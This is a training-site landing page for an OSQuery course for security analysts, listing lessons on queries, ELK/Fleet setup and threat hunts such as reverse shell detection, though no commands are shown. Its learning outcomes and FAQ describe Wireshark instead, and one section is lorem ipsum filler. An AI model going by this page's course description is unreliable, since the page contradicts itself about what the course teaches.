logo
Sign in
Sign in
OSQuery for Security Analyst

OSQuery for Security Analyst

Learn OSQuery to monitor, investigate, and secure your endpoints effectively. Unlock the power of OSQuery to detect security threats on your network and gain deeper visibility into your endpoints.
5/5
  • 4.721 students
  • Last updated 25/7/2023

Course Description


This self-paced course is designed to equip Security Analysts with practical skills in OSQuery, a powerful open-source tool for endpoint monitoring and security. You’ll begin with OSQuery basics, learning how to set up and configure it, and progress to crafting advanced queries to monitor system events, analyze logs, and detect anomalies.

Through hands-on labs, you’ll simulate real-world security scenarios and build your capability in incident response and threat hunting. Ideal for SOC Analysts and IT security professionals, this course will empower you to utilize OSQuery for comprehensive endpoint visibility and proactive threat detection.

What You Will Learn

  • Install and configure Wireshark for network analysis
  • Capture and interpret network packets in real time
  • Identify common network protocols and anomalies
  • Filter and dissect traffic to find security threats
  • Analyze TCP, UDP, and ICMP traffic for threats
  • Detect signs of network attacks, such as DDoS and spoofing
  • Apply Wireshark in incident response scenarios
  • Optimize Wireshark for large-scale traffic monitoring

Pre-requisites

  • Basic knowledge of networking concepts
  • Some experience with Linux or Windows systems
  • Familiarity with network protocols

Target Audience

Security Analysts

IT professionals

SOC members

Network Engineers

Cybersecurity Professionals

Course Content

  • What is Osquery?
  • How Osquery works?
  • Installing Osquery on Linux
  • Installing Osquery on Windows
  • SELECT Statement – Fetching Data from Tables
  • WHERE Clause – Filtering the Results
  • AND / OR – Combining Multiple Conditions
  • ORDER BY and LIMIT – Sorting and Trimming Results
  • LIKE and IN – Pattern and Value Matching
  • COUNT() and GROUP BY – Aggregating and Grouping Data
  • JOINs in Osquery – Combining Related Tables
  • Querying live data with osqueryi
  • Important Tables
  • Osquery config file
  • Osquery logs
  1. Setting up ELK
  2. Setting up Fleet Server
  3. Setting up Fleet Agent
  4. Getting started with Osquery
  • Detecting New Processes
  • Unusual Network Connections
  • Scheduled Tasks and Cron Jobs
  • USB/External Device Usage
  • New User Accounts Created
  • Threat Hunting Process
  • Hunt#1: PowerShell Abuse via Command Line
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for PowerShell Abuse using Osquery
  • Hunt#2: Malicious Process from Temp Directory
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Malicious Process
  • Hunt#3: Suspicious Scheduled Tasks
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Suspicious Scheduled Tasks
  • Hunt#4: Persistence via Startup Items
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Persistence via Startup Items
  • Hunt#5: Reverse Shell Execution
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Reverse Shell Execution

Instructor

Rajneesh Gupta

Senior Security Consultant

  • With over a decade of experience in cybersecurity and author of multiple works on security monitoring, Rajneesh is a trusted expert in open-source security tools, cloud security, and SOC automation. He has implemented and optimized ELK deployments for global clients and specializes in turning raw log data into actionable security intelligence. Rajneesh’s instruction style is both practical and thorough, ensuring you gain job-ready ELK skills.
Join the Waiting List!

This course includes:

  • 8.5+ Hours of Learning Modules
  • 10+ Attacks and Detections
  • Certificate of Completion
  • Lifetime Community Access
  • Access on mobile and TV
Testimonial

What alumni say about us

I spent years troubleshooting networks, craving more impact and challenge. This bootcamp wasn't just training; it was a transformation. The hands-on mentoring and real-world interview scenarios were key to landing my new role. For anyone in IT feeling stuck, this is your launchpad.
Alex Johnson
Alex JohnsonSecurity Analyst
Writing code was my day-to-day, but I longed for the thrill of cybersecurity. The week dedicated to LinkedIn opened unexpected doors, leading me to my current role as a consultant. The bootcamp wasn't just a course; it was a career catalyst.
Jamie Chase
Jamie ChaseAppSec Engineer
As an IT Admin, I was comfortable but not fulfilled. The bootcamp's resume makeover and targeted interview prep were game-changers. Now, as an Incident Response Analyst, I face new challenges daily. This journey has been nothing short of rewarding.
Airish Chandra
Airish ChandraIncident Responder
Transitioning from testing software to analyzing security threats felt like a leap into the unknown. The bootcamp demystified this transition, providing practical projects and interview practice. Now, I tackle security challenges with confidence. It's been a career-defining move.
Taylor Pierce
Taylor PierceInformation security Analyst
I aimed to transition from network engineering to a SOC Analyst role, but the path wasn't clear until this bootcamp. The initial career mentoring set the stage for success, and by the end, I was not just ready but eager. Today, I thrive in my role, equipped with invaluable skills and confidence.
Casey James
Casey JamesSOC Analyst
Dreaming of a more dynamic role than IT support, I found this bootcamp. The comprehensive curriculum and intense interview prep were transformative, propelling me into a cybersecurity engineering position. For IT professionals seeking growth, this experience is a pivotal stepping stone
Sayantan Chandra
Sayantan ChandraSecurity Engineer
Common Questions

Most Popular Questions

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.

What exactly is Wireshark?

Wireshark is an open-source tool that captures and analyzes network traffic in real time. It allows security professionals to examine network packets and identify anomalies, suspicious behavior, and threats at the packet level.

Do I need any previous experience with Wireshark?

No prior experience with Wireshark is required. The course covers both the basics and advanced concepts, making it suitable for beginners and professionals looking to deepen their expertise.

How long does it take to complete the course?

This course is self-paced, so you can complete it at your own pace. On average, learners take 4-6 weeks to finish, but you have lifetime access to revisit any section.

What practical skills will I gain?

You'll gain hands-on skills in capturing, filtering, and analyzing network traffic to detect threats. By the end, you'll be able to use Wireshark to recognize various network attacks, identify suspicious patterns, and apply these skills to incident response scenarios.

Is the course content updated for the latest version of Wireshark?

Yes, we regularly update the content to ensure compatibility with the latest version of Wireshark, covering new features, improvements, and any relevant security techniques.

Will I receive a certificate of completion?

Yes, upon successful completion, you will receive a certificate from HaxSecurity that you can add to your resume and LinkedIn profile to showcase your Wireshark skills.

What resources will I need for this course?

You’ll need a computer with a stable internet connection to download Wireshark and capture network traffic. No additional software is required, and detailed setup instructions are provided within the course.

What support options are available during the course?

Throughout the course, you can reach out to our support team via email or join our discussion forums to interact with peers. Additionally, Rajneesh hosts periodic live Q&A sessions to address specific questions and provide guidance.

Featured Online Course

Stay ahead with content based on the latest industry trends and practices.

  • 1403A, Bhumiraj Costarica, Plot no 1 and 2, Palm Beach Service Road, Sanpada, Navi Mumbai, Maharashtra 400705
  • [email protected]
  • +91 7977252454

Company

Learn

Newsletter

Sign up our newsletter to get update information, news and free insight.
Facebook-f Instagram Youtube Linkedin-in
Copyright © 2025, Tesseract Global Technologies Pvt Ltd